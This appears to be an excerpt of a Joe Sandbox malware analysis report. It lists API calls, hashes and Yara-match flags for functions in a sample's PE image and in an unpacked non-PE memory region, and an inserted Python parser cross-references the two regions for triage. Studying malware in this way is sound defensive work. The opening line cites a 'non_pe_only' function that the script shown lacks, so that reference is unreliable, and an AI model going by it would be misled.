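Run against the full report rather than the excerpt, the same script gives a quick split of the dump: functions that pair with a constant delta are the original image relocated into the non-PE region, while IDs returned by `non_pe_only` are the ones to look at first, because they have no counterpart in the file on disk.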
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024E4ACD
                                                                                                                                                                                                                                                                      • Part of subcall function 024E4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024E4800), ref: 024E4DAC
                                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024E4AE2
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E4AF1
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024E4AFF
                                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024E4B75
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E4BB5
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 024E4BC3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3151764488-0
                                                                                                                                                                                                                                                                    • Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                    • Instruction ID: 2ea8a0853e9e86f2de4b29290f49ad23bc5bce756762d402b32a1c8f3249b468
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C31B639A002149FDF04EF69C881B6E73B6FF44725F20456BD92697351DB70EA05CB94
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                    • Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                    • Instruction ID: e6ab7ff3c47bba42d778d37706de1a90f88c636105697c1691e707d1ea793f03
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0311B471604165BBEB612F778C48D6B7A9DFFC2B31B12066BFD16D7290DA308845CAB0
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A3D1
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                      • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A3DC
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A3E7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A43B
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A446
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A451
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 0043A45C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                    • Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024FA331: _free.LIBCMT ref: 024FA35A
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA638
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: HeapFree.KERNEL32(00000000,00000000,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?), ref: 024F36E7
                                                                                                                                                                                                                                                                      • Part of subcall function 024F36D1: GetLastError.KERNEL32(?,?,024FA35F,?,00000000,?,00000000,?,024FA603,?,00000007,?,?,024FA9F7,?,?), ref: 024F36F9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA643
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA64E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA6A2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA6AD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA6B8
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024FA6C3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                    • Instruction ID: be180c3adb70505bde73375396f051b30b6fbbecdb948a331ced7e905a8ed422
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5211F171644B54AAEEB0BBB3CC45FCF7B9EDF84B00F40482EA39DAA150DAA5B5144E50
                                                                                                                                                                                                                                                                    APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID:
• API String ID: 4227777306-0
• Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
• Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
• Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
• Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D2667
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D266D
• GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D269A
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D26A4
• GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D26B6
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D26CC
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D26DA
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID:
• API String ID: 4227777306-0
• Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
• Instruction ID: 26e38f2dac3e4023e2e5585a06d76b5f3be93a43b9b04ccd42e2cf5fe1bf0ba3
• Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
• Instruction Fuzzy Hash: 8D01F73D500215A7DB20FF66EC18FAF3B78AF42F52B10043BF802D2161DBA4D9048AA8
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
• GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,024D670B), ref: 024D2500
• GetProcAddress.KERNEL32(00000000), ref: 024D2507
• GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D2522
• GetLastError.KERNEL32(?,?,?,024D670B), ref: 024D252E
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D2544
• __CxxThrowException@8.LIBVCRUNTIME ref: 024D2552
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• String ID: kernel32.dll
• API String ID: 4179531150-1793498882
• Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
• Instruction ID: ebd6521cd78994c65d6b730ff413855624693a4e360f8ace3d365fa691f2760a
• Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
• Instruction Fuzzy Hash: 03F086759043103FB7117B757C6D91B3FADDD46A22320062BF811E2292EBB585418558
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040C677
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Exception@8Throw
• String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-3619870194
• Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
• Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
• Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
• Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
• _memcmp.LIBVCRUNTIME ref: 0043116C
• _free.LIBCMT ref: 004311DD
• _free.LIBCMT ref: 004311F6
• _free.LIBCMT ref: 00431228
• _free.LIBCMT ref: 00431231
• _free.LIBCMT ref: 0043123D
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: _free$ErrorLast$_memcmp
• String ID:
• API String ID: 4275183328-0
• Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
• Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
• Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
• Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44
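The function listings above come from two memory dumps: the PE-backed image at offset 00400000 and the non-PE-backed region at offset 024C0000 that carries Yara matches. The listing itself already contains two relationships worth checking during triage: the same API String ID (4227777306-0) appears once in each region, and the GetProcAddress/GetModuleHandleW arguments in the 024C0000 code (00446CDC, 00446CF4, 00446D0C) lie in the address range of the 00400000 image. The following added example, which is not part of the Joe Sandbox report or its tooling, parses this listing format into records and performs both checks. It assumes the bullet character and field labels exactly as rendered above; because the listing does not state a region's size, IMAGE_SIZE_GUESS is an assumed upper bound used only to classify pointer arguments. The embedded sample is a trimmed copy of three listings from this report.

```python
"""Parse Joe Sandbox per-function 'APIs / Memory Dump Source / Similarity'
listings and cross-reference PE-backed against non-PE-backed regions.
Added example; not code from the Joe Sandbox report."""
import re
from collections import defaultdict

# One call line: optional 'Part of subcall function X: ', API name, .MODULE,
# optional (args) with a trailing comma, then 'ref: <8 hex digits>'.
CALL_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_][\w:@]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\),?)?\s+ref:\s+(?P<ref>[0-9A-F]{8})$"
)
SOURCE_RE = re.compile(
    r"^•\s+Source File: .*?, Offset: (?P<base>[0-9A-F]{8}), based on PE: (?P<pe>true|false)$"
)
KV_RE = re.compile(r"^•\s+(?P<key>API ID|String ID|API String ID|Opcode ID): ?(?P<val>.*)$")
HEX_RE = re.compile(r"^[0-9A-F]{8}$")

IMAGE_SIZE_GUESS = 0x100000  # assumption: the listing gives no region size


def parse_functions(text):
    """Return one record per 'APIs' block: calls, dump base, PE-backed flag, Yara flag, IDs."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()  # report lines arrive with heavy indentation
        if line == "APIs":
            cur = {"calls": [], "base": None, "pe": None, "yara": False}
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur["calls"].append({"api": m["api"], "module": m["module"], "args": args,
                                 "ref": int(m["ref"], 16), "subcall": m["sub"] is not None})
            continue
        m = SOURCE_RE.match(line)
        if m:
            cur["base"], cur["pe"] = int(m["base"], 16), m["pe"] == "true"
            continue
        if line == "Yara matches":
            cur["yara"] = True
            continue
        m = KV_RE.match(line)
        if m:
            cur[m["key"]] = m["val"]
    return funcs


def shared_api_signatures(funcs):
    """API String IDs present in both a PE-backed and a non-PE-backed function."""
    by_sig = defaultdict(lambda: {"pe": set(), "nonpe": set(), "api_id": ""})
    for f in funcs:
        sig = f.get("API String ID")
        if not sig or f["base"] is None:
            continue
        by_sig[sig]["api_id"] = f.get("API ID", "")
        by_sig[sig]["pe" if f["pe"] else "nonpe"].add(f["base"])
    return {s: v for s, v in by_sig.items() if v["pe"] and v["nonpe"]}


def cross_region_pointers(funcs, image_size=IMAGE_SIZE_GUESS):
    """Hex arguments in non-PE-backed code that fall inside a PE-backed image's assumed range."""
    images = sorted({f["base"] for f in funcs if f["pe"]})
    hits = []
    for f in funcs:
        if f["pe"] is not False:
            continue
        for c in f["calls"]:
            for a in c["args"]:
                if HEX_RE.match(a):
                    v = int(a, 16)
                    for base in images:
                        if base <= v < base + image_size:
                            hits.append((hex(c["ref"]), c["api"], hex(v), hex(base)))
    return hits


# Trimmed copy of three listings from the report above (constructed sample input).
SAMPLE = """\
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
• __CxxThrowException@8.LIBVCRUNTIME ref: 00412473
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
• API String ID: 4227777306-0
APIs
• GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,024D0DA0,?,?,?,00000000), ref: 024D2667
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024D26CC
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
Similarity
• API String ID: 4227777306-0
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,024D670B), ref: 024D24B6
• GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024D24C4
• GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024D24D2
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
Similarity
• String ID: kernel32.dll
• API String ID: 4179531150-1793498882
"""

if __name__ == "__main__":
    fs = parse_functions(SAMPLE)
    print(shared_api_signatures(fs))
    print(cross_region_pointers(fs))
```

Running it on the full report text (the same parser works on the unindented listing) reports API String ID 4227777306-0 as shared between 00400000 and 024C0000, and three GetProcAddress/GetModuleHandleW arguments in the 024C0000 code that point into the 00400000 image. Neither check is proof on its own: shared API String IDs only say the same API sequence exists in both regions, and the pointer check depends on the assumed image size, so confirm against the dump's actual section layout before concluding which region holds the unpacked payload.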
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024F25EC,00000001,00000001,?), ref: 024F23F5
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024F25EC,00000001,00000001,?,?,?,?), ref: 024F247B
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024F2575
• __freea.LIBCMT ref: 024F2582
  • Part of subcall function 024F390E: RtlAllocateHeap.NTDLL(00000000,024CDAD7,00000000), ref: 024F3940
• __freea.LIBCMT ref: 024F258B
• __freea.LIBCMT ref: 024F25B0
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
APIs
• Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024E3051
  • Part of subcall function 024D8AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 024D8ABD
• SafeSQueue.LIBCONCRT ref: 024E306A
• Concurrency::location::_Assign.LIBCMT ref: 024E312A
• std::invalid_argument::invalid_argument.LIBCONCRT ref: 024E314B
• __CxxThrowException@8.LIBVCRUNTIME ref: 024E3159
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
• String ID:
• API String ID: 3496964030-0
APIs
• FindSITargetTypeInstance.LIBVCRUNTIME ref: 024E8F77
• FindMITargetTypeInstance.LIBVCRUNTIME ref: 024E8F90
• FindVITargetTypeInstance.LIBVCRUNTIME ref: 024E8F97
• PMDtoOffset.LIBCMT ref: 024E8FB6
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: FindInstanceTargetType$Offset
• String ID:
• API String ID: 1467055271-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
• String ID:
• API String ID: 1687354797-0
APIs
• GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,EA95E0BC), ref: 00428DE8
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
• SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,EA95E0BC), ref: 00428E61
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,024E9038,024E69C9,02500907,00000008,02500C6C,?,?,?,?,024E3CB2,?,?,0045A064), ref: 024E904F
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024E905D
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024E9076
• SetLastError.KERNEL32(00000000,?,024E9038,024E69C9,02500907,00000008,02500C6C,?,?,?,?,024E3CB2,?,?,0045A064), ref: 024E90C8
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
• int.LIBCPMT ref: 00404D7A
  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
• std::locale::_Getfacet.LIBCPMT ref: 00404D83
• std::_Facet_Register.LIBCPMT ref: 00404DB4
• std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
• __CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 024C4FCA
• int.LIBCPMT ref: 024C4FE1
  • Part of subcall function 024CBFC3: std::_Lockit::_Lockit.LIBCPMT ref: 024CBFD4
  • Part of subcall function 024CBFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 024CBFEE
• std::locale::_Getfacet.LIBCPMT ref: 024C4FEA
• std::_Facet_Register.LIBCPMT ref: 024C501B
• std::_Lockit::~_Lockit.LIBCPMT ref: 024C5031
• __CxxThrowException@8.LIBVCRUNTIME ref: 024C504F
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
• String ID:
• API String ID: 2243866535-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
• int.LIBCPMT ref: 0040C1B1
  • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
  • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
• std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
• std::_Facet_Register.LIBCPMT ref: 0040C1EB
• std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
